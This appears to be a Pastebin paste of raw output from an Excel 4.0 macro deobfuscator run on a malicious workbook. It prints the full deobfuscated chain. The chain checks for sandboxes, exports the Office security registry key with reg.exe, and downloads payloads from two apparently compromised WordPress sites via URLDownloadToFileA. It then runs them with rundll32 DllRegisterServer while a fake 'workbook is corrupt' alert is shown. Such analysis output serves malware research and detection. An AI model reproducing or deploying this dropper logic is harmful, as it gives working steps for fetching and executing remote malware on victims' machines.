Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- auto_open: auto_open->Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!$AG$4609
- [Starting Deobfuscation]
- CELL:AG4609 , FullEvaluation ,FORMULA.FILL("-19.4",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!J47428)
- CELL:AG4610 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!P1757)
- CELL:P1757 , FullEvaluation ,FORMULA.FILL("103.5",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ5126)
- CELL:P1758 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW28226)
- CELL:AW28226 , FullEvaluation ,FORMULA.FILL("24",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV27471)
- CELL:AW28227 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CX1185)
- CELL:CX1185 , FullEvaluation ,FORMULA.FILL("125",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GS53177)
- CELL:CX1186 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IN52324)
- CELL:IN52324 , FullEvaluation ,FORMULA.FILL("-49.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EP63404)
- CELL:IN52325 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU23026)
- CELL:DU23026 , FullEvaluation ,FORMULA.FILL("-432.25",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CS18382)
- CELL:DU23027 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HQ54667)
- CELL:HQ54667 , FullEvaluation ,FORMULA.FILL("-431",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AI56425)
- CELL:HQ54668 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BA29292)
- CELL:BA29292 , FullEvaluation ,FORMULA.FILL("208",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EP49854)
- CELL:BA29293 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IN10715)
- CELL:IN10715 , FullEvaluation ,FORMULA.FILL("16.6",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DW30235)
- CELL:IN10716 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CC50114)
- CELL:CC50114 , FullEvaluation ,FORMULA.FILL("45",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AU21703)
- CELL:CC50115 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV26230)
- CELL:HV26230 , FullEvaluation ,FORMULA.FILL("204",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!T44829)
- CELL:HV26231 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FK46285)
- CELL:FK46285 , FullEvaluation ,FORMULA.FILL("257",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU1459)
- CELL:FK46286 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IT54104)
- CELL:IT54104 , FullEvaluation ,FORMULA.FILL("147.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EN33239)
- CELL:IT54105 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FZ31102)
- CELL:FZ31102 , FullEvaluation ,FORMULA.FILL("300",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DY25916)
- CELL:FZ31103 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HK46610)
- CELL:HK46610 , FullEvaluation ,FORMULA.FILL("64",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EB18916)
- CELL:HK46611 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FU9381)
- CELL:FU9381 , FullEvaluation ,FORMULA.FILL("101",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AM52178)
- CELL:FU9382 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AL40024)
- CELL:AL40024 , FullEvaluation ,FORMULA.FILL("-180.75",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DJ50650)
- CELL:AL40025 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DR50223)
- CELL:DR50223 , FullEvaluation ,FORMULA.FILL("-80",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EZ41859)
- CELL:DR50224 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!A61465)
- CELL:A61465 , FullEvaluation ,FORMULA.FILL("-380",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BV5310)
- CELL:A61466 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BE23997)
- CELL:BE23997 , FullEvaluation ,FORMULA.FILL("-578",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC31490)
- CELL:BE23998 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AK47754)
- CELL:AK47754 , FullEvaluation ,FORMULA.FILL("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EY35505)
- CELL:AK47755 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BN5637)
- CELL:BN5637 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\rundll32.exe""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BU5841)
- CELL:BN5638 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL25607)
- CELL:GL25607 , FullEvaluation ,FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS2095)
- CELL:GL25608 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BW23350)
- CELL:BW23350 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS838)
- CELL:BW23351 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HQ9091)
- CELL:HQ9091 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CB2526)
- CELL:HQ9092 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BC65215)
- CELL:BC65215 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CN32845)
- CELL:BC65216 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!N59953)
- CELL:N59953 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!U21055)
- CELL:N59954 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HK40654)
- CELL:HK40654 , FullEvaluation ,FORMULA.FILL("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL41507)
- CELL:HK40655 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CF37393)
- CELL:CF37393 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EU17908)
- CELL:CF37394 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FW23082)
- CELL:FW23082 , FullEvaluation ,FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE8598)
- CELL:FW23083 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DN34043)
- CELL:DN34043 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\3ubDcx.reg""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DB23252)
- CELL:DN34044 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EZ34143)
- CELL:EZ34143 , FullEvaluation ,FORMULA.FILL("=R[-10969]C[-18]&GET.WORKSPACE(2)&""\Excel\Security ""&R[3685]C[5]&"" /y""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CW19567)
- CELL:EZ34144 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GZ20828)
- CELL:GZ20828 , FullEvaluation ,FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HW60470)
- CELL:GZ20829 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CT59787)
- CELL:CT59787 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[39911]C[-22],R[-992]C[-152],0,5)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IS20559)
- CELL:CT59788 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FH7265)
- CELL:FH7265 , FullEvaluation ,FORMULA.FILL("=WHILE(ISERROR(FILES(R[-26287]C[-72])))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49539)
- CELL:FH7266 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HI35007)
- CELL:HI35007 , FullEvaluation ,FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49540)
- CELL:HI35008 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HO35474)
- CELL:HO35474 , FullEvaluation ,FORMULA.FILL("=NEXT()",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49541)
- CELL:HO35475 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HU5719)
- CELL:HU5719 , FullEvaluation ,FORMULA.FILL("=""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC65423)
- CELL:HU5720 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CH4760)
- CELL:CH4760 , FullEvaluation ,FORMULA.FILL("=""http://theislandmen.com/wp-smart.php""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!G56096)
- CELL:CH4761 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IC41305)
- CELL:IC41305 , FullEvaluation ,FORMULA.FILL("=FOPEN(R[-31159]C[-9])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DK54411)
- CELL:IC41306 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FR64405)
- CELL:FR64405 , FullEvaluation ,FORMULA.FILL("=FPOS(R[28056]C[-119],215)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ26355)
- CELL:FR64406 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FP48504)
- CELL:FP48504 , FullEvaluation ,FORMULA.FILL("=FREAD(R[-2685]C[-83],255)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GP57096)
- CELL:FP48505 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AD42538)
- CELL:AD42538 , FullEvaluation ,FORMULA.FILL("=FCLOSE(R[-3110]C[-84])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ57521)
- CELL:AD42539 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EK15074)
- CELL:EK15074 , FullEvaluation ,FORMULA.FILL("=FILE.DELETE(R[-17443]C[75])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AE40695)
- CELL:EK15075 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GB4920)
- CELL:GB4920 , FullEvaluation ,FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-6135]C[4])),CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL63231)
- CELL:GB4921 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FG18856)
- CELL:FG18856 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\iTuTkLL.html""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE12504)
- CELL:FG18857 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BE33857)
- CELL:BE33857 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-55410]C[-86],R[-45001]C[-74],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FA57505)
- CELL:BE33858 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DU10606)
- CELL:DU10606 , FullEvaluation ,FORMULA.FILL("=FILES(R[-4582]C[34])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW17086)
- CELL:DU10607 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CO25990)
- CELL:CO25990 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[-31215]C[-181]),CLOSE(FALSE),)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV48301)
- CELL:CO25991 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GD42294)
- CELL:GD42294 , FullEvaluation ,FORMULA.FILL("=""C:\Users\Public\ieWn8FXU.html""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!ER20373)
- CELL:GD42295 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ40890)
- CELL:GQ40890 , FullEvaluation ,FORMULA.FILL("=R[-38146]C[-91]&"",DllRegisterServer""",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IE58519)
- CELL:GQ40891 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EF57495)
- CELL:EF57495 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[25011]C[-20],R[-20039]C[99],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW40412)
- CELL:EF57496 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DF12742)
- CELL:DF12742 , FullEvaluation ,FORMULA.FILL("=FILES(R[295]C[142])",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!F20078)
- CELL:DF12743 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DL31167)
- CELL:DL31167 , FullEvaluation ,FORMULA.FILL("=IF(ISERROR(R[-20753]C[-131]),,RUN(R[-3649]C[15]))",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EG40831)
- CELL:DL31168 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BT26772)
- CELL:BT26772 , FullEvaluation ,FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[31449]C[-135],R[-4274]C[6],0,0)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL24647)
- CELL:BT26773 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CI19987)
- CELL:CI19987 , FullEvaluation ,FORMULA.FILL("=ALERT(R[-1677]C[3],2)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
- CELL:CI19988 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CX37204)
- CELL:CX37204 , FullEvaluation ,FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-33829]C[-18],R[18849]C[148],0,5)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
- CELL:CX37205 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GO64254)
- CELL:GO64254 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
- CELL:GO64255 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EY35505)
- CELL:EY35505 , FullEvaluation ,"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:EY35506 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BU5841)
- CELL:BU5841 , FullEvaluation ,"C:\Windows\system32\rundll32.exe"
- CELL:BU5842 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS2095)
- CELL:BS2095 , FullEvaluation ,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
- CELL:BS2096 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!BS838)
- CELL:BS838 , NotImplemented ,APP.MAXIMIZE()
- CELL:BS839 , FullEvaluation ,RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CB2526)
- CELL:CB2526 , FullBranching ,IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
- CELL:CB2526 , End ,[TRUE] CLOSE(FALSE)
- CELL:CB2526 , FullEvaluation ,[FALSE]
- CELL:CB2527 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CN32845)
- CELL:CN32845 , FullBranching , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
- CELL:CN32845 , End , [TRUE] CLOSE(FALSE)
- CELL:CN32845 , FullEvaluation , [FALSE]
- CELL:CN32846 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!U21055)
- CELL:U21055 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
- CELL:U21056 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL41507)
- CELL:EL41507 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
- CELL:EL41508 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EU17908)
- CELL:EU17908 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
- CELL:EU17909 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE8598)
- CELL:CE8598 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
- CELL:CE8599 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DB23252)
- CELL:DB23252 , FullEvaluation , "C:\Users\Public\3ubDcx.reg"
- CELL:DB23253 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CW19567)
- CELL:CW19567 , FullEvaluation , EXPORT HKCU\Software\Microsoft\Office\"GET.WORKSPACE(2)\Excel\Security "C:\Users\Public\3ubDcx.reg /y
- CELL:CW19568 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HW60470)
- CELL:HW60470 , FullEvaluation , "C:\Windows\system32\reg.exe"
- CELL:HW60471 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IS20559)
- CELL:IS20559 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\reg.exe""","EXPORT HKCU\Software\Microsoft\Office\""GET.WORKSPACE(2)\Excel\Security ""C:\Users\Public\3ubDcx.reg /y",0,5)
- CELL:IS20560 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FV49539)
- CELL:FV49539 , PartialEvaluation , WHILE("""C:\Users\Public\3ubDcx.reg""")
- CELL:FV49540 , PartialEvaluation , WAIT(NOW()+"00:00:01")
- CELL:FV49541 , PartialEvaluation , NEXT()
- CELL:FV49542 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AC65423)
- CELL:AC65423 , FullEvaluation , "http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php"
- CELL:AC65424 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!G56096)
- CELL:G56096 , FullEvaluation , "http://theislandmen.com/wp-smart.php"
- CELL:G56097 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!DK54411)
- CELL:DK54411 , PartialEvaluation , FOPEN("""C:\Users\Public\3ubDcx.reg""")
- CELL:DK54412 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HZ26355)
- CELL:HZ26355 , PartialEvaluation , FPOS("""""""C:\Users\Public\3ubDcx.reg""""""",215)
- CELL:HZ26356 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GP57096)
- CELL:GP57096 , PartialEvaluation , FREAD("""""""C:\Users\Public\3ubDcx.reg""""""",255)
- CELL:GP57097 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GQ57521)
- CELL:GQ57521 , PartialEvaluation , FCLOSE("""""""C:\Users\Public\3ubDcx.reg""""""")
- CELL:GQ57522 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AE40695)
- CELL:AE40695 , NotImplemented , FILE.DELETE(R[-17443]C[75])
- CELL:AE40696 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!GL63231)
- CELL:GL63231 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-6135]C[4])),CLOSE(FALSE),)
- CELL:GL63232 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CE12504)
- CELL:CE12504 , FullEvaluation , "C:\Users\Public\iTuTkLL.html"
- CELL:CE12505 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FA57505)
- CELL:FA57505 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","""C:\Users\Public\iTuTkLL.html""",0,0)
- CELL:FA57506 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW17086)
- CELL:AW17086 , PartialEvaluation , FILES("""C:\Users\Public\iTuTkLL.html""")
- CELL:AW17087 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!HV48301)
- CELL:HV48301 , FullBranching , IF(ISERROR(R[-31215]C[-181]),CLOSE(FALSE),)
- CELL:HV48301 , End , [TRUE] CLOSE(FALSE)
- CELL:HV48301 , FullEvaluation , [FALSE]
- CELL:HV48302 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!ER20373)
- CELL:ER20373 , FullEvaluation , "C:\Users\Public\ieWn8FXU.html"
- CELL:ER20374 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!IE58519)
- CELL:IE58519 , FullEvaluation , "C:\Users\Public\ieWn8FXU.html",DllRegisterServer
- CELL:IE58520 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!AW40412)
- CELL:AW40412 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""","""C:\Users\Public\ieWn8FXU.html""",0,0)
- CELL:AW40413 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!F20078)
- CELL:F20078 , PartialEvaluation , FILES("""C:\Users\Public\ieWn8FXU.html""")
- CELL:F20079 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EG40831)
- CELL:EG40831 , FullBranching , IF(ISERROR(R[-20753]C[-131]),,RUN(R[-3649]C[15]))
- CELL:EG40831 , FullEvaluation , [TRUE]
- CELL:EG40832 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EL24647)
- CELL:EL24647 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""http://theislandmen.com/wp-smart.php""","""C:\Users\Public\ieWn8FXU.html""",0,0)
- CELL:EL24648 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
- CELL:EV37182 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
- CELL:EV37183 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
- CELL:CM39670 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\ieWn8FXU.html"",DllRegisterServer",0,5)
- CELL:CM39671 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
- CELL:FJ6373 , End , CLOSE(FALSE)
- CELL:EG40831 , FullEvaluation , [FALSE] RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!EV37182)
- CELL:EV37182 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",2)
- CELL:EV37183 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!CM39670)
- CELL:CM39670 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","""C:\Users\Public\ieWn8FXU.html"",DllRegisterServer",0,5)
- CELL:CM39671 , FullEvaluation , RUN(Izdxo9x56IFL1JQZhlGzFBCxVIEmmW!FJ6373)
- CELL:FJ6373 , End , CLOSE(FALSE)
- time elapsed: 6.086402177810669
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement